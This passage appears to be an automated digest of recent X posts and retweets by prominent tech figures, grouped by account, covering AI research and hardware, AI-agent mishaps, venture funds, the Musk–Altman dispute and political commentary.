MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN…\n[原文链接](https://x.com/ylecun/status/2048069805807128734)\n\n**[2026-04-24T20:50:37+00:00]**\n> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53…\n[原文链接](https://x.com/ylecun/status/2047780272297382384)\n\n**[2026-04-24T19:31:52+00:00]**\n> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what \"goo…\n[原文链接](https://x.com/ylecun/status/2047760455679246500)\n\n**[2026-04-24T17:45:08+00:00]**\n> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in …\n[原文链接](https://x.com/ylecun/status/2047733594064408894)\n\n**[2026-04-24T15:23:18+00:00]**\n> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能…\n[原文链接](https://x.com/ylecun/status/2047697898989572176)\n\n**[2026-04-24T14:14:06+00:00]**\n> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their…\n[原文链接](https://x.com/ylecun/status/2047680485208531152)\n\n**[2026-04-24T13:58:49+00:00]**\n> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also …\n[原文链接](https://x.com/ylecun/status/2047676640059154653)\n\n**[2026-04-24T11:19:36+00:00]**\n> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th…\n[原文链接](https://x.com/ylecun/status/2047636569767419951)\n\n**[2026-04-24T10:30:09+00:00]**\n> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI…\n[原文链接](https://x.com/ylecun/status/2047624126047670758)\n\n**[2026-04-24T06:38:08+00:00]**\n> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabi…\n[原文链接](https://x.com/ylecun/status/2047565736382534091)\n\n**[2026-04-23T23:15:06+00:00]**\n> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇\n[原文链接](https://x.com/ylecun/status/2047454244781818205)\n\n**[2026-04-23T18:12:46+00:00]**\n> RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️ Read for free or purchase in print ➡️ https://archive.org/details/vanishing-cultu…\n[原文链接](https://x.com/ylecun/status/2047378161860776085)\n\n**[2026-04-23T14:27:57+00:00]**\n> RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear desi…\n[原文链接](https://x.com/ylecun/status/2047321581966291154)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(12 条)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://x.com/JeffDean/status/2048759102390899142)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://x.com/JeffDean/status/2048351736037826877)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://x.com/JeffDean/status/2047665074471387456)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://x.com/JeffDean/status/2047408945950802186)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://x.com/JeffDean/status/2047407537566495033)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://x.com/JeffDean/status/2047405389856297387)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://x.com/JeffDean/status/2047403921912873257)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://x.com/JeffDean/status/2047339995682529313)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://x.com/JeffDean/status/2046673188193701901)\n\n**[2026-04-21T17:02:26+00:00]**\n> RT by @JeffDean: The future of computer vision is agentic. 1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in st…\n[原文链接](https://x.com/JeffDean/status/2046635685206208533)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://x.com/JeffDean/status/2046632664493384060)\n\n**[2026-04-20T21:46:52+00:00]**\n> RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudN…\n[原文链接](https://x.com/JeffDean/status/2046344875994739028)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(3 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://x.com/soumithchintala/status/2048756358820827564)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://x.com/soumithchintala/status/2047191747793649805)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://x.com/soumithchintala/status/2046282944139215141)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(20 条)\n\n**[2026-04-27T15:50:31+00:00]**\n> If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say…\n[原文链接](https://x.com/GaryMarcus/status/2048791912149295182)\n\n**[2026-04-27T15:33:34+00:00]**\n> R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.\n[原文链接](https://x.com/GaryMarcus/status/2048787646206677207)\n\n**[2026-04-27T15:31:37+00:00]**\n> This is totally wrong. Blaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.\n[原文链接](https://x.com/GaryMarcus/status/2048787157536653627)\n\n**[2026-04-27T14:27:36+00:00]**\n> yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to end well.\n[原文链接](https://x.com/GaryMarcus/status/2048771044987777428)\n\n**[2026-04-27T13:32:43+00:00]**\n> ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your dat…\n[原文链接](https://x.com/GaryMarcus/status/2048757233174122827)\n\n**[2026-04-27T12:48:41+00:00]**\n> R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n[原文链接](https://x.com/GaryMarcus/status/2048746152749846549)\n\n**[2026-04-27T12:36:05+00:00]**\n> People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, without proper backups…\n[原文链接](https://x.com/GaryMarcus/status/2048742983684784239)\n\n**[2026-04-27T12:20:17+00:00]**\n> “Vibe coded disasters piling up on Reddit”\n[原文链接](https://x.com/GaryMarcus/status/2048739005525877072)\n\n**[2026-04-27T03:39:49+00:00]**\n> RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. The second greatest is calling autocomplete-in-a-loop an “agent”.\n[原文链接](https://x.com/GaryMarcus/status/2048608025464705084)\n\n**[2026-04-27T02:41:14+00:00]**\n> “Always keep a separate backup.” For sure, every experienced programmer should know this. 𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵. And we now have a legion of synthetic coding…\n[原文链接](https://x.com/GaryMarcus/status/2048593283639894520)\n\n**[2026-04-27T02:25:10+00:00]**\n> RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. We build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of ev…\n[原文链接](https://x.com/GaryMarcus/status/2048589239915577837)\n\n**[2026-04-27T01:59:04+00:00]**\n> RT by @GaryMarcus: the beauty of a jagged frontier is that every failure is the user's fault and every breakthrough is the model's glory\n[原文链接](https://x.com/GaryMarcus/status/2048582672163995766)\n\n**[2026-04-27T01:48:56+00:00]**\n> RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment somethin…\n[原文链接](https://x.com/GaryMarcus/status/2048580122521780676)\n\n**[2026-04-27T01:44:47+00:00]**\n> RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.\n[原文链接](https://x.com/GaryMarcus/status/2048579079121555764)\n\n**[2026-04-27T01:40:43+00:00]**\n> the difference is that we don’t *hype* giving 12 year-olds bulldozers. *of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point. …\n[原文链接](https://x.com/GaryMarcus/status/2048578055283880296)\n\n**[2026-04-27T01:09:02+00:00]**\n> RT by @GaryMarcus: Never ever use generative AI for anything critical. The technology is probablistic all the way down and therefore inherently unreliable. Why is this so hard to understand? It’s wil…\n[原文链接](https://x.com/GaryMarcus/status/2048570082843082905)\n\n**[2026-04-27T01:00:07+00:00]**\n> Generative AI as the Hindenberg\n[原文链接](https://x.com/GaryMarcus/status/2048567837221089669)\n\n**[2026-04-27T00:25:00+00:00]**\n> Is it me or X starting to look like a vibe coded mess? Polls are broken. Accounts are getting hacked. My DMs are full of phishing scams. Basics that used to work no longer work.\n[原文链接](https://x.com/GaryMarcus/status/2048558998325166498)\n\n**[2026-04-27T00:02:43+00:00]**\n> R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:\n[原文链接](https://x.com/GaryMarcus/status/2048553390540734479)\n\n**[2026-04-27T00:00:53+00:00]**\n> Total AI disaster, totally predictable\n[原文链接](https://x.com/GaryMarcus/status/2048552931923013916)\n\n---\n\n### ✅ @elonmusk — Elon Musk(19 条)\n\n**[2026-04-27T16:54:21+00:00]**\n> Calling him “Scam” Altman is accurate. This is very much worth reading.\n[原文链接](https://x.com/elonmusk/status/2048807976991850953)\n\n**[2026-04-27T16:39:59+00:00]**\n> RT by @elonmusk: Sam Altman cannot be trusted. • The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI. • A major report talked to over 10…\n[原文链接](https://x.com/elonmusk/status/2048804363595059425)\n\n**[2026-04-27T16:31:33+00:00]**\n> Exactly\n[原文链接](https://x.com/elonmusk/status/2048802239272169582)\n\n**[2026-04-27T16:30:27+00:00]**\n> Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. Greg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Com…\n[原文链接](https://x.com/elonmusk/status/2048801964457140540)\n\n**[2026-04-27T16:21:30+00:00]**\n> Scam Altman\n[原文链接](https://x.com/elonmusk/status/2048799712375902624)\n\n**[2026-04-27T15:56:52+00:00]**\n> RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱\n[原文链接](https://x.com/elonmusk/status/2048793511701717143)\n\n**[2026-04-27T15:26:33+00:00]**\n> RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions. \"I truly believe, like in my soul, that he is trying to help humanity.\" \"He has these …\n[原文链接](https://x.com/elonmusk/status/2048785882950549854)\n\n**[2026-04-27T15:15:09+00:00]**\n> If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n[原文链接](https://x.com/elonmusk/status/2048783014075777369)\n\n**[2026-04-27T14:53:45+00:00]**\n> Excellent point\n[原文链接](https://x.com/elonmusk/status/2048777628019032335)\n\n**[2026-04-27T12:50:55+00:00]**\n> RT by @elonmusk: Today marks the start of the Elon Musk v.Sam Altman trial. Two opposing worldviews. Sam Altman transformed a non-profit organization into one of the world's most profitable companies…\n[原文链接](https://x.com/elonmusk/status/2048746715805581608)\n\n**[2026-04-27T12:40:59+00:00]**\n> RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet. • Up to 3 Starlink antennas on each A380 for massive …\n[原文链接](https://x.com/elonmusk/status/2048744214230712500)\n\n**[2026-04-27T11:35:33+00:00]**\n> RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. OpenAI doesn’t “benefit all of humanity.”\n[原文链接](https://x.com/elonmusk/status/2048727747954868342)\n\n**[2026-04-27T11:08:22+00:00]**\n> RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his p…\n[原文链接](https://x.com/elonmusk/status/2048720909809156378)\n\n**[2026-04-27T03:11:45+00:00]**\n> Grok Imagine\n[原文链接](https://x.com/elonmusk/status/2048600964102246438)\n\n**[2026-04-27T02:26:57+00:00]**\n> Curiosity & adventure are my philosophy https://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a\n[原文链接](https://x.com/elonmusk/status/2048589691054694406)\n\n**[2026-04-26T23:22:48+00:00]**\n> Remember this\n[原文链接](https://x.com/elonmusk/status/2048543344746250466)\n\n**[2026-04-26T22:50:49+00:00]**\n> Grad school indoctrination camps\n[原文链接](https://x.com/elonmusk/status/2048535299102265720)\n\n**[2026-04-26T21:21:33+00:00]**\n> RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets. He predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky. The scary part: h…\n[原文链接](https://x.com/elonmusk/status/2048512831692452091)\n\n**[2026-04-26T16:14:38+00:00]**\n> RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.” Among very conservative people it’s just 3%. In other words, the far left is 8x more likely to support…\n[原文链接](https://x.com/elonmusk/status/2048435593244237849)\n\n---\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-04-27T10:01:28+00:00]**\n> One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n[原文链接](https://x.com/paulg/status/2048704073356935676)\n\n**[2026-04-27T09:50:40+00:00]**\n> You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.\n[原文链接](https://x.com/paulg/status/2048701354672050286)\n\n**[2026-04-27T08:17:48+00:00]**\n> Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\n[原文链接](https://x.com/paulg/status/2048677984106664227)\n\n**[2026-04-27T04:08:42+00:00]**\n> RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France. My French friend of @Fundoraclu…\n[原文链接](https://x.com/paulg/status/2048615296613937201)\n\n**[2026-04-26T14:48:06+00:00]**\n> RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one. GPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it. Whole ne…\n[原文链接](https://x.com/paulg/status/2048413815675539816)\n\n**[2026-04-26T14:47:09+00:00]**\n> Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought…\n[原文链接](https://x.com/paulg/status/2048413578789634100)\n\n**[2026-04-26T14:40:28+00:00]**\n> Durer was the original Dr Seuss.\n[原文链接](https://x.com/paulg/status/2048411898081583547)\n\n**[2026-04-26T14:36:59+00:00]**\n> Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I…\n[原文链接](https://x.com/paulg/status/2048411021329453562)\n\n**[2026-04-26T13:37:21+00:00]**\n> RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank https://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-cal…\n[原文链接](https://x.com/paulg/status/2048396013816152216)\n\n**[2026-04-26T11:57:10+00:00]**\n> Good use of camouflage by Biscuit.\n[原文链接](https://x.com/paulg/status/2048370801833828507)\n\n**[2026-04-25T14:17:57+00:00]**\n> RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.\n[原文链接](https://x.com/paulg/status/2048043843690561556)\n\n**[2026-04-25T13:02:57+00:00]**\n> Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.\n[原文链接](https://x.com/paulg/status/2048024967996993760)\n\n**[2026-04-25T12:34:34+00:00]**\n> RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. Founders, particularly first time founders, need to sear this …\n[原文链接](https://x.com/paulg/status/2048017824895909901)\n\n**[2026-04-25T12:32:40+00:00]**\n> Whoah, self-driving cars compete with airlines. I never considered that till now.\n[原文链接](https://x.com/paulg/status/2048017345000415744)\n\n**[2026-04-25T10:55:23+00:00]**\n> RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like…\n[原文链接](https://x.com/paulg/status/2047992864118894954)\n\n**[2026-04-25T08:33:48+00:00]**\n> RT by @paulg: GitHub outages since Microsoft acquisition 🤣\n[原文链接](https://x.com/paulg/status/2047957234664030380)\n\n**[2026-04-25T07:44:30+00:00]**\n> Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else. https://paulgraham.com/hamming.html\n[原文链接](https://x.com/paulg/status/2047944827887591681)\n\n**[2026-04-25T07:35:28+00:00]**\n> R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the…\n[原文链接](https://x.com/paulg/status/2047942555254288757)\n\n**[2026-04-25T07:30:15+00:00]**\n> The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you h…\n[原文链接](https://x.com/paulg/status/2047941243234107691)\n\n**[2026-04-24T19:36:00+00:00]**\n> RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT. In an attempt to influence American foreign policy, …\n[原文链接](https://x.com/paulg/status/2047761493274571036)\n\n---\n\n### ✅ @naval — Naval Ravikant(11 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://x.com/naval/status/2047645157080658335)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://x.com/naval/status/2047550896670908809)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://x.com/naval/status/2047546920747307466)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://x.com/naval/status/2047520212787015748)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://x.com/naval/status/2047519250433421604)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://x.com/naval/status/2047510419565420779)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://x.com/naval/status/2047481012826124516)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://x.com/naval/status/2047471220451578132)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://x.com/naval/status/2047334901033123913)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://x.com/naval/status/2046991137022648800)\n\n**[2026-04-22T14:36:51+00:00]**\n> RT by @naval: Announcing my new thing: I'm launching a new public venture fund USVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future A…\n[原文链接](https://x.com/naval/status/2046961436593713241)\n\n---\n\n### ✅ @pmarca — Marc Andreessen(20 条)\n\n**[2026-04-27T08:14:21+00:00]**\n> 😳\n[原文链接](https://x.com/pmarca/status/2048677114480873657)\n\n**[2026-04-27T08:07:29+00:00]**\n> cc @BrendanEich\n[原文链接](https://x.com/pmarca/status/2048675385119019444)\n\n**[2026-04-27T08:04:13+00:00]**\n> 👀\n[原文链接](https://x.com/pmarca/status/2048674564314685477)\n\n**[2026-04-27T08:01:44+00:00]**\n> But \"A Disservice To Those Who Are Watching\" is the name of this show!\n[原文链接](https://x.com/pmarca/status/2048673940072251670)\n\n**[2026-04-27T07:59:56+00:00]**\n> cc @elonmusk\n[原文链接](https://x.com/pmarca/status/2048673488383447437)\n\n**[2026-04-27T04:43:41+00:00]**\n> When one thing becomes abundant and cheap, another thing becomes scarce and valuable.\n[原文链接](https://x.com/pmarca/status/2048624098398650608)\n\n**[2026-04-27T04:32:43+00:00]**\n> Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"\n[原文链接](https://x.com/pmarca/status/2048621340408844368)\n\n**[2026-04-27T04:29:26+00:00]**\n> Image\n[原文链接](https://x.com/pmarca/status/2048620511912194339)\n\n**[2026-04-27T04:10:44+00:00]**\n> The apps can rewrite the files. 👀\n[原文链接](https://x.com/pmarca/status/2048615807190769738)\n\n**[2026-04-27T04:07:00+00:00]**\n> Many such cases.\n[原文链接](https://x.com/pmarca/status/2048614869352714619)\n\n**[2026-04-27T04:06:10+00:00]**\n> 🇺🇸\n[原文链接](https://x.com/pmarca/status/2048614659595583651)\n\n**[2026-04-27T04:04:46+00:00]**\n> Many such cases (in the universe).\n[原文链接](https://x.com/pmarca/status/2048614305705386433)\n\n**[2026-04-27T03:56:11+00:00]**\n> Concerning.\n[原文链接](https://x.com/pmarca/status/2048612144871264609)\n\n**[2026-04-27T03:49:14+00:00]**\n> Self recommending!\n[原文链接](https://x.com/pmarca/status/2048610397243265189)\n\n**[2026-04-27T03:01:18+00:00]**\n> Self recommending recommending.\n[原文链接](https://x.com/pmarca/status/2048598334492033455)\n\n**[2026-04-27T02:57:11+00:00]**\n> 👀\n[原文链接](https://x.com/pmarca/status/2048597298150875169)\n\n**[2026-04-27T02:34:50+00:00]**\n> 👀\n[原文链接](https://x.com/pmarca/status/2048591674688037210)\n\n**[2026-04-27T02:25:08+00:00]**\n> Overheard in Silicon Valley: \"Did a Claw post this?\"\n[原文链接](https://x.com/pmarca/status/2048589233095643240)\n\n**[2026-04-27T01:20:46+00:00]**\n> Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"\n[原文链接](https://x.com/pmarca/status/2048573035616375134)\n\n**[2026-04-26T21:32:43+00:00]**\n> Many such cases.\n[原文链接](https://x.com/pmarca/status/2048515643268567431)\n\n---\n\n### ✅ @david_tiantian — David Tian Wang(0 条)\n\n---\n\n### ✅ @morganhousel — Morgan Housel(2 条)\n\n**[2026-04-22T18:05:41+00:00]**\n> \"Self-control is empathy with your future self.\" - Seinfeld\n[原文链接](https://x.com/morganhousel/status/2047013991046881663)\n\n**[2026-04-21T03:24:00+00:00]**\n> RT by @morganhousel: I’m in love with this sentence: “The best math you can learn is how to calculate the future cost of current decisions.”\n[原文链接](https://x.com/morganhousel/status/2046429717834654025)\n\n---\n\n### ✅ @eladgil — Elad Gil(20 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://x.com/eladgil/status/2048230781739581745)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://x.com/eladgil/status/2047748613976264835)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://x.com/eladgil/status/2047489459378397604)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://x.com/eladgil/status/2047421448449630379)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://x.com/eladgil/status/2047373700643844303)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://x.com/eladgil/status/2047365014500389353)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://x.com/eladgil/status/2047364865527075139)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://x.com/eladgil/status/2047052737762980083)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://x.com/eladgil/status/2046722094348771758)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://x.com/eladgil/status/2046695194054320150)\n\n**[2026-04-21T19:36:05+00:00]**\n> The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱\n[原文链接](https://x.com/eladgil/status/2046674350993223784)\n\n**[2026-04-21T17:21:44+00:00]**\n> AI for email++\n[原文链接](https://x.com/eladgil/status/2046640542218604783)\n\n**[2026-04-20T23:50:03+00:00]**\n> 🔥\n[原文链接](https://x.com/eladgil/status/2046375878368940239)\n\n**[2026-04-20T18:51:07+00:00]**\n> R to @eladgil: Link to fuller post: https://substack.com/home/post/p-194229552?source=queue\n[原文链接](https://x.com/eladgil/status/2046300649483374704)\n\n**[2026-04-20T17:46:29+00:00]**\n> Here is the sbstack version \"Random thoughts while gazing at the misty AI Frontier\" https://blog.eladgil.com/p/random-thoughts-while-gazing-at-the\n[原文链接](https://x.com/eladgil/status/2046284381439103043)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 13/12 Anti-AI regulation & violence will both 